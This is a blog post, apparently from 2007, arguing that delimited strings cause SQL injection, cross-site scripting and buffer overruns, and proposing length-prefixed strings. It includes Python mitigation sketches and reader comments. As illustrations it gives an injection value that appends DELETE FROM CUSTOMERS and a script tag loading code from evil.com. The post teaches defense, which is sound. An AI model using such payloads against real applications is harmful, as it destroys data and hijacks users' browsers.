Delimited data has been one of the most persistent problems in software development for as long as I can remember, and yet nobody seems to have identified the larger issue here.
Delimiting is a common practice that persists right up through the year 2007. Text strings of unknown length are delimited with special characters: quotes, apostrophes, commas, nulls, or even XML tags.
In the simplest example, you put quotes around a string, like "hello", and computers identify the string by looking for the beginning and ending quotes. This is second nature to any literate human, and it seems like such a simple and trivial thing to do, but these types of text delimiters are one of the largest sources of faults and vulnerabilities in computer software today.
At the heart of the problem is the practice of mixing code and data in an unmanaged way.
The classic example that all developers deal with is text strings used in SQL statements. In SQL, text strings are delimited with single quotes. An example query that executes a customer search based on a customer's last name would look like this:
SELECT * from CUSTOMERS where lastName = 'Smith';
And that works great. Then a month later your program blows up because someone had a last name with a single quote in the name, like O'Reilly:
SELECT * from CUSTOMERS where lastName = 'O'Reilly';
And the computer ralphs because a) This SQL statement has invalid syntax and b) There is no customer with a last name of O anyway.
So, the best case scenario is that your software crashes on every apostrophe. A worse case scenario is that a hacker uses this vulnerability to destroy your database by embedding additional commands into the string.
Example: ask for a customer with a last name of "XYZ'; DELETE FROM CUSTOMERS;"
This causes your SELECT statement to become:
SELECT * FROM CUSTOMERS where lastName = 'XYZ'; DELETE FROM CUSTOMERS;'
See, you've tricked SQL into executing a DELETE statement by sending the proper character sequence (apostrophe semicolon) that ends the previous statement and starts a new one. This is called "SQL Injection". It takes virtually zero skill to do something like this, and the damage caused is catastrophic. This is one of the most common types of malicious hacks done on internet sites today. There are ways to prevent SQL Injection by using parameterized SQL statements, but there are too many developers who don't know this or forget to do this.
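To make the parameterized approach concrete, here is a minimal sketch using Python's built-in sqlite3 module. The in-memory database, the single-column CUSTOMERS table, and the function names are assumptions made up for illustration. The unsafe version builds the query by pasting the name between quotes; the safe version passes the name separately through a "?" placeholder.

```python
import sqlite3


def make_demo_db():
    # Hypothetical in-memory database with a one-column CUSTOMERS table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CUSTOMERS (lastName TEXT)")
    conn.executemany(
        "INSERT INTO CUSTOMERS VALUES (?)", [("Smith",), ("O'Reilly",)]
    )
    return conn


def find_customers_unsafe(conn, last_name):
    # Vulnerable: the name is pasted into the SQL text, so an apostrophe
    # in the data ends the string literal early.
    query = (
        "SELECT lastName FROM CUSTOMERS WHERE lastName = '" + last_name + "'"
    )
    return conn.execute(query).fetchall()


def find_customers_safe(conn, last_name):
    # Parameterized: the value travels separately from the SQL text and is
    # never parsed as SQL, whatever characters it contains.
    return conn.execute(
        "SELECT lastName FROM CUSTOMERS WHERE lastName = ?", (last_name,)
    ).fetchall()
```

With the safe version, a name like O'Reilly is matched literally, and a name that carries extra SQL is just a name that matches no customer. With the unsafe version, the same apostrophe produces a syntax error.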
Using XML tags to delimit data seems more secure...right? Well, it's definitely more complicated, but it is no more secure. Even more popular than SQL Injection is a hacking technique called "Cross-Site Scripting". It works just like SQL Injection in that you provide a data string that contains code for executing a malicious program - only this time you are hacking HTML instead of SQL.
HTML code for displaying a name might look like this:
<label>John Doe</label>
A malicious hacker takes advantage of this by saving their name as:
John <script src="evil.com/evil.js"></script>Doe
And thus the HTML generated is:
<label>John <script src="evil.com/evil.js"></script>Doe</label>
Since the browser can't reliably tell the difference between code and data, it will execute the embedded JavaScript program. This JavaScript program can do all manner of bad things to you if you are unfortunate enough to see a page containing this user's name.
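For comparison, the usual present-day workaround is to escape the data before it is placed into the page. The sketch below uses Python's standard html.escape function; the two render functions are hypothetical names invented for this example. Note that this is still the "remember to call the right library" approach, not a true boundary between code and data.

```python
import html


def render_name_unsafe(name):
    # Vulnerable: whatever the user typed becomes part of the markup.
    return "<label>" + name + "</label>"


def render_name_escaped(name):
    # html.escape replaces <, >, & and quote characters with entities,
    # so the browser displays them as text instead of parsing them as tags.
    return "<label>" + html.escape(name) + "</label>"
```

Passing the malicious name through render_name_escaped yields markup in which the script tag appears as visible text and is not executed.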
Software development today is practically brimming over with all manner of specs and schemes that involve delimiting text data with special characters or other sequences of text data. This leads to more cases of mayhem and vulnerability than I could ever recount here.
The very editor I'm typing in right now (here on blogger.com) is giving me fits and problems because of the sample HTML code I wrote above while using this HTML editor. It can't figure out whether to interpret my example HTML as just text or real HTML commands. I can't blame blogger.com too much for this, because using HTML to edit HTML is a total blurring of code and data, and it's incredibly difficult to do intelligently. Again this is an example of the problem I'm talking about: blending code with data.
Maybe you think C programmers were so clever by choosing to terminate strings with NULL characters? Well, that has led to one of the biggest sources of security vulnerabilities ever: Buffer Overruns!
A browser routine or OS routine that accepts a null-terminated string will patiently keep reading string data until it finds that NULL character. If you are a hacker, you just make sure you never send that NULL character where the routine expects it. You keep sending data until you overflow whatever fixed-size buffer is being used. Now you can write past the end of that buffer into adjacent memory, including malicious code to execute. Just like the browser, the operating system will have a very difficult time telling the difference between code and data.
I've listed several major examples where delimited strings are, at best, a major problem. I could also tell frightful tales of things gone wrong with comma-separated values, tab-separated values, URL encoding, URL re-writing, URL spoofing, forced directory navigation (dot-dot), tag-based page development, hidden macro commands, function-key activation, etc.
But I think my point is clear: Delimited strings are dangerous, and they are a major problem. Code and data should never be mixed without iron-clad boundary definitions.
My solution: Defined-length strings!
A defined-length string enforces a clear boundary between code and data by defining the length of a string outside of the string itself.
There are many ways of doing this. Here is one way:
Instead of "This is my text" use [15]This is my text
The [15] is code that tells a computer that the following string is 15 characters long. The computer will read data for 15 characters, no less, no more, and be immune to the data itself containing any special characters. The 16th character is guaranteed to be the beginning of new code, because the determination of the length of the data is entirely outside of a user's control. (Think about it.)
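As a rough sketch of how a reader for this notation might work, here is a small Python example. The function names encode_field and read_field are made up for illustration, and the bracket syntax is just the one notation shown above. The reader parses the length first, then takes exactly that many characters without ever inspecting them.

```python
def encode_field(text):
    # Prefix the data with its length in characters, e.g. "[8]O'Reilly".
    return "[" + str(len(text)) + "]" + text


def read_field(stream, pos=0):
    """Read one [N]data field starting at pos; return (data, next_pos)."""
    if stream[pos] != "[":
        raise ValueError("expected '[' at position %d" % pos)
    close = stream.index("]", pos)
    digits = stream[pos + 1:close]
    if not (digits.isascii() and digits.isdigit()):
        raise ValueError("length must be a non-negative integer")
    start = close + 1
    end = start + int(digits)
    if end > len(stream):
        raise ValueError("field is shorter than its declared length")
    # The data is sliced out by position only; its contents are never
    # scanned for quotes, brackets, or any other special character.
    return stream[start:end], end
```

For example, read_field("[8]O'Reilly;") returns the 8 characters O'Reilly along with the position of the semicolon, where parsing of code resumes. Data that itself contains brackets or quotes round-trips unchanged.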
SQL statements could be written as follows:
SELECT * from USERS where last_name = [8]O'Reilly;
HTML fields could be written as follows:
<label length="8">John Doe</label> or <label>[8]John Doe</label>
Now the browser knows that those 8 characters are to be treated as data, not code, no matter what.
Similar to the way C compilers automatically add a NULL character at the end of a string literal, maybe compilers could be designed to add the length to the beginning of a string. A compiler could reserve the first 4 bytes of a string for a 32-bit unsigned integer containing the length of the string. The language could make this implementation fairly transparent to the developer, and even allow for Unicode strings.
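The 4-byte length prefix could look something like the following sketch, written in Python with the standard struct module. The function names, the big-endian byte order, and the choice of UTF-8 are all assumptions for illustration. One design point worth noting: for Unicode text the prefix counts encoded bytes, not characters.

```python
import struct


def pack_string(text):
    # Encode to UTF-8, then prepend the byte length as a 32-bit unsigned
    # big-endian integer (struct format ">I").
    data = text.encode("utf-8")
    return struct.pack(">I", len(data)) + data


def unpack_string(buf, offset=0):
    """Read one length-prefixed string; return (text, next_offset)."""
    (length,) = struct.unpack_from(">I", buf, offset)
    start = offset + 4
    end = start + length
    if end > len(buf):
        raise ValueError("buffer is shorter than the declared length")
    # Exactly `length` bytes are taken; an embedded NUL byte is ordinary data.
    return buf[start:end].decode("utf-8"), end
```

Because the reader knows the length before it touches the data, it never has to search for a terminator, and it can refuse a string whose declared length runs past the end of the buffer.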
The point is that you force your code to strongly define all of its boundaries. Once you do that, then the data can safely fall into place without all the hassles and errors and risks we face today. The data can never "steal control" because the code never relinquishes control to begin with.
Oh, and by the way, this is not an attack on functional programming. I know functional programming prides itself on being able to blur the distinction between code and data. As long as this is done in some kind of controlled manner that does not allow for unintended code injection, that's fine.
Perhaps yet another alternative to handling this problem is to build string encoding right into the language itself, so that every character of every string is always encoded no matter what. This is similar to brute-force URL encoding where every character is changed to its %xx equivalent, whether it needs to be or not. This seems like it would be a waste of space and processing time compared to defined-length strings, but at least it is one other way of addressing the problem.
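A brute-force encoder of this kind is only a few lines. The sketch below is in Python; encode_all and decode_all are hypothetical names, and encoding the UTF-8 bytes of the text is an assumption made so that non-ASCII characters work too.

```python
def encode_all(text):
    # Every byte becomes %XX, whether or not it "needs" escaping.
    return "".join("%%%02X" % b for b in text.encode("utf-8"))


def decode_all(encoded):
    # The encoded form is a strict sequence of 3-character %XX groups.
    if len(encoded) % 3 != 0:
        raise ValueError("encoded length must be a multiple of 3")
    raw = bytearray()
    for i in range(0, len(encoded), 3):
        if encoded[i] != "%":
            raise ValueError("expected '%%' at position %d" % i)
        raw.append(int(encoded[i + 1:i + 3], 16))
    return raw.decode("utf-8")
```

The encoded output contains only percent signs and hex digits, so it can never contain a quote, tag, or semicolon. The cost is visible too: the encoded form is three times the size of the original bytes.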
I just want this problem to be addressed, because Software Engineering is difficult enough without having to always keep track of code-injection, character escaping, buffer overflowing, and all manner of other data vulnerabilities.
3 comments:
Ah, pascal-style strings are poised for a comeback!
I have no idea what programming language you are using, but I know I've never had this trouble as I use classes that automatically escape all that garbage. As for your 'sql hack' sequence (';delete...) .. garbage. The sql library I use ignores any semicolons. What kind of garbage language, libraries, etc. do you use to run into problems like this??
Libraries are not the solution. This is something that needs to be built into the language.
You claim you have libraries and classes that "fix" these problems, and that's great.
But this only works if you have 3rd party libraries for every possible situation, and the developer knows to use them.
Amateur developers get burned because they DON'T KNOW to use a special library to make their SQL statements safe. Even veteran developers get burned when they forget to take these precautions.
This is something that should be taken care of by the language and not by custom classes and libraries.
What if someone invents a new Query Language called "TQL"? How do you make TQL statements safe? Write yet another custom filter class? YUK!